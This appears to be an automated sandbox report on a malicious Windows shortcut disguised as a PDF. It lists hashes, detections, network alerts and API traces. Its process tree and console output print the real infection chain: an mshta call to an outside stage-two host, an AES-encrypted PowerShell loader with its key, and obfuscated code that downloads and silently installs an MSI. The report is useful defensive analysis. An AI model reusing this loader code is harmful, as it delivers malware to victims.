Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 19, 2024, 1:18 p.m.	April 19, 2024, 1:21 p.m.

Size	2.0KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Fri May 7 23:13:59 2021, mtime=Fri May 7 23:13:59 2021, atime=Fri May 7 23:13:59 2021, length=41472, window=hidenormalshowminimized
MD5	`f9f276db97c371b83765a24ee1d14d66`
SHA256	`57aa9cce85c62c5f29fd37a5cc02f11d1f7c0ecb73a8e17688bae859d4695f42`
CRC32	`5606F7F0`
ssdeep	`24:8faNkDmgih41Av94zcuhJBkOtp+/4P+8PxkSlqdd79dsW28mT84abtl868z7m:8famDmCC9AJL77mSgdJ9pn4a46q`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "wjIKIzri" C:\Users\test22\AppData\Local\Temp\SA162.pdf.lnk
2144
- forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://0had.com/stage2"
  1368
  - powershell.exe . mshta http://0had.com/stage2
    2376
    - mshta.exe "C:\Windows\system32\mshta.exe" http://0had.com/stage2
      1192
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function dIcfq($EIHqQ){return -split ($EIHqQ -replace '..', '0x$& ')};$rQOkxJ = dIcfq('2E06F507D03C819EA24495C6B0C0F17251DE594DAE971052747249D184E6E5DF1DD3631C5728B8C332B3844379C90DD55A300B00590CED5C3E93CF314BD7CC2EE020C9CDF7E044B5C41487792AD76BF7C6FD16298D8BE725412174B9FC660BF878FEE68B736D6C6F2D92556C96BDC73F51E1603E96C5D231C0046F8BEC47500CB01EEF682F60DE3C346CF426DB8B0167685BFCEDE092CDB0E22473267706E82BB1A778C2D427F48CD5533F066E076D71647B3861B9C36277BF02A97521ACE70B0B187C5FD2CD4F1472F0C3F439AF098F08858C37AE9A0CB4DA4E9B397D0BD2D42AA40639B50AF43D962FB63FE91E5EF95C6A68D07B631480E072CA7BEAAD1EB40B6E74FECB61EE70DC5A8FA00F64B482D94CA0767D18225246D36A85E0AC788AB4C51486F451384539D7C1175EE26797A04FA67D04C978C0C555A81782032931F69B8F92B039281B4E22256D1DCFA0AF90FD767270C27BB92FA14445A7224EBC73B0D5F7D50107B183B58C9A876D88F76938152308F3A5A12331C2FAE0B5731C1110DD719A8DC62C247C2981DFC6F7FDECFF8D6CC66CB6A6141A5258DB50EC50A6A82537006403DCD7B84EC1F5131B505AA82344AF28838DE92B11873F1D6C82D8584F2431D5768024E4B7A77B4D35005A573DF556236B1C1B3FCF4115A5081ECB727F41A06838004D589C894119D157B4FBC6A026BBA1A0417C975D505CE5AFADC1B35006869B6910D97EB0AD66A6ECA680DFB922B8EA02284BAE324A3FA74984A300BB9E5E4F2E279E6F5528A6B1670812E5A7D6E30BFC1254BABC43ABDB2E2810DB1B6E5C3731ED0B68E1BBEF5EAF00C8F8D9F0FFB6E2D9C86441BF83596B12D8C1D1615418641DB81857A4E17BF0EE90472CC23F29AED3DDC539980682D2BAE287883757D8313BB489F3C364D0F0C716E59FB15D600E392B696B8B776C18EE347AA2CB26EF3FD809BAC3E4A12ABA247773506FABECC78F6CCAC0C4E1F0674900FC693CA82137026FF68CF0934DA5845710FEE54625EE1E1D34895E24AD7FC4DD8212428DC378372FAD6930C24637E24C8AD0E53828AC18410DDE7CE03F4B1AC1F9EECD70804E9A53FE17F1F1CB485944770F55E81789654E264BEF8FF403D24CC654BE2852475205928E6043EDF69AD60F31E5F5039C022DEFFAE35D1B5F87ED0A9195F9938B32F712333D3E166A20C1948CE34123285B3F4E823774885B597EB7A8AC160E81F020CA3D1A3DF05C59CD04F8A023380FE2E57305C3C60B393596B74D44B8011A9F6EBEA97950832E925B913AB79768B8882D8CA7FCE5C630331E222C0103CD79EC8BCB5E19E8970F1241182C85468019F5576E6E34C3835A00C8548670ED7FBDF98BF6F271BF707680D1EBFD7D6A38187A73FEC730CE976865D5407D76120ED2A450AFD837E959D1F27EFE7E35EF3A2115B02B75B35AC2D2FBFAF4290A7A29A0A750ACBF9393341FB90457F056187770A860FABAC5C0045FF70261675F56B68518C24FE186A5ACFD80D3726997E487390D694F069FADA849');$QsFeX = [System.Security.Cryptography.Aes]::Create();$QsFeX.Key = dIcfq('49585252535A526E7648576269484A4E');$QsFeX.IV = New-Object byte[] 16;$rXQrgilN = $QsFeX.CreateDecryptor();$FmtjJIyba = $rXQrgilN.TransformFinalBlock($rQOkxJ, 0, $rQOkxJ.Length);$sQblIgVuf = [System.Text.Encoding]::Utf8.GetString($FmtjJIyba);$rXQrgilN.Dispose();& $sQblIgVuf.Substring(0,3) $sQblIgVuf.Substring(3)
        1324
        
        msiexec.exe "C:\Windows\system32\msiexec.exe" /qn /i C:\Users\test22\AppData\Roaming\putty.msi
        2556

Name	Response	Post-Analysis Lookup
0had.com	A 195.58.51.130	195.58.51.130

IP Address	Status	Action
164.124.101.2	Active	Moloch
195.58.51.130	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49172 -> 195.58.51.130:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49173 -> 195.58.51.130:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49175 -> 195.58.51.130:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49174 -> 195.58.51.130:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 195.58.51.130:80 -> 192.168.56.102:49167	2014819	ET INFO Packed Executable Download	Misc activity
TCP 195.58.51.130:80 -> 192.168.56.102:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:16 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 19, 2024, 1:16 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:16 p.m.			0	0

Command line console output was observed (50 out of 125 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x0000001b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x00000027	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x00000033	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: sl3, Tls"." console_handle: 0x0000003f	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: At line:1 char:246 console_handle: 0x0000004b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: + function nuY($JhE, $pFi){[IO.File]::WriteAllBytes($JhE, $pFi)};function laS($ console_handle: 0x00000057	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: JhE){msiexec.exe /qn /i $JhE};function Ekp($GZu){$yXR = New-Object (nCQ @(4096, console_handle: 0x00000063	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: 4119,4134,4064,4105,4119,4116,4085,4126,4123,4119,4128,4134));[Net.ServicePoint console_handle: 0x0000006f	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Manager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$pFi = $yX console_handle: 0x0000007b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: R.DownloadData($GZu);return $pFi};function nCQ($vjE){$bXi=4018;$oJO=$Null;forea console_handle: 0x00000087	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ch($dxM in $vjE){$oJO+=[char]($dxM-$bXi)};return $oJO};function FUF(){$ByZ = $e console_handle: 0x00000093	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: nv:AppData + '\';$ixOzKdrB= $env:AppData;$hEJzAl = $ixOzKdrB + '\SA160.pdf';If( console_handle: 0x0000009f	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Test-Path -Path $hEJzAl){Invoke-Item $hEJzAl;}Else{ $JbHpyFH = Ekp (nCQ @(4122, console_handle: 0x000000ab	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ,4101,4083,4067,4072,4066,4064,4130,4118,4120));nuY $hEJzAl $JbHpyFH;Invoke-Ite console_handle: 0x000000c3	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: m $hEJzAl;};;;$HTyBKnz = $ByZ + 'putty.msi'; if (Test-Path -Path $HTyBKnz){laS console_handle: 0x000000cf	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: $HTyBKnz;}Else{$rObZokeaY = Ekp (nCQ @(4122,4134,4134,4130,4133,4076,4065,4065, console_handle: 0x000000db	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ,4133,4123));nuY $HTyBKnz $rObZokeaY;laS $HTyBKnz};;;}FUF; console_handle: 0x000000f3	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x000000ff	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000010b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x0000012b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x00000137	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: At line:1 char:323 console_handle: 0x00000143	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: + function nuY($JhE, $pFi){[IO.File]::WriteAllBytes($JhE, $pFi)};function laS($ console_handle: 0x0000014f	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: JhE){msiexec.exe /qn /i $JhE};function Ekp($GZu){$yXR = New-Object (nCQ @(4096, console_handle: 0x0000015b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: 4119,4134,4064,4105,4119,4116,4085,4126,4123,4119,4128,4134));[Net.ServicePoint console_handle: 0x00000167	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Manager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$pFi = $yXR.Down console_handle: 0x00000173	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: loadData <<<< ($GZu);return $pFi};function nCQ($vjE){$bXi=4018;$oJO=$Null;forea console_handle: 0x0000017f	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ch($dxM in $vjE){$oJO+=[char]($dxM-$bXi)};return $oJO};function FUF(){$ByZ = $e console_handle: 0x0000018b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: nv:AppData + '\';$ixOzKdrB= $env:AppData;$hEJzAl = $ixOzKdrB + '\SA160.pdf';If( console_handle: 0x00000197	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Test-Path -Path $hEJzAl){Invoke-Item $hEJzAl;}Else{ $JbHpyFH = Ekp (nCQ @(4122, console_handle: 0x000001a3	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ,4101,4083,4067,4072,4066,4064,4130,4118,4120));nuY $hEJzAl $JbHpyFH;Invoke-Ite console_handle: 0x000001bb	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: m $hEJzAl;};;;$HTyBKnz = $ByZ + 'putty.msi'; if (Test-Path -Path $HTyBKnz){laS console_handle: 0x000001c7	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: $HTyBKnz;}Else{$rObZokeaY = Ekp (nCQ @(4122,4134,4134,4130,4133,4076,4065,4065, console_handle: 0x000001d3	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ,4133,4123));nuY $HTyBKnz $rObZokeaY;laS $HTyBKnz};;;}FUF; console_handle: 0x000001eb	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001f7	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000203	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null. console_handle: 0x00000223	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Parameter name: bytes" console_handle: 0x0000022f	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: At line:1 char:50 console_handle: 0x0000023b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: + function nuY($JhE, $pFi){[IO.File]::WriteAllBytes <<<< ($JhE, $pFi)};function console_handle: 0x00000247	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: laS($JhE){msiexec.exe /qn /i $JhE};function Ekp($GZu){$yXR = New-Object (nCQ @ console_handle: 0x00000253	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: (4096,4119,4134,4064,4105,4119,4116,4085,4126,4123,4119,4128,4134));[Net.Servic console_handle: 0x0000025f	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$pFi = $yX console_handle: 0x0000026b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: R.DownloadData($GZu);return $pFi};function nCQ($vjE){$bXi=4018;$oJO=$Null;forea console_handle: 0x00000277	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ch($dxM in $vjE){$oJO+=[char]($dxM-$bXi)};return $oJO};function FUF(){$ByZ = $e console_handle: 0x00000283	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: nv:AppData + '\';$ixOzKdrB= $env:AppData;$hEJzAl = $ixOzKdrB + '\SA160.pdf';If( console_handle: 0x0000028f	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: Test-Path -Path $hEJzAl){Invoke-Item $hEJzAl;}Else{ $JbHpyFH = Ekp (nCQ @(4122, console_handle: 0x0000029b	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: ,4101,4083,4067,4072,4066,4064,4130,4118,4120));nuY $hEJzAl $JbHpyFH;Invoke-Ite console_handle: 0x000002b3	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: m $hEJzAl;};;;$HTyBKnz = $ByZ + 'putty.msi'; if (Test-Path -Path $HTyBKnz){laS console_handle: 0x000002bf	1	1
WriteConsoleW April 19, 2024, 1:16 p.m.	buffer: $HTyBKnz;}Else{$rObZokeaY = Ekp (nCQ @(4122,4134,4134,4130,4133,4076,4065,4065, console_handle: 0x000002cb	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 88 events)

Time & API	Arguments	Status	Return
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fc308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fca48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fbd08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006fbd08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393c90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393c90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393c90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393750 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393750 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393750 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393750 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393750 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00393750 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 19, 2024, 1:16 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET http://0had.com/stage2

Allocates read-write-execute memory (usually to unpack itself) (50 out of 309 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73911000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73912000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ee2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0220b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
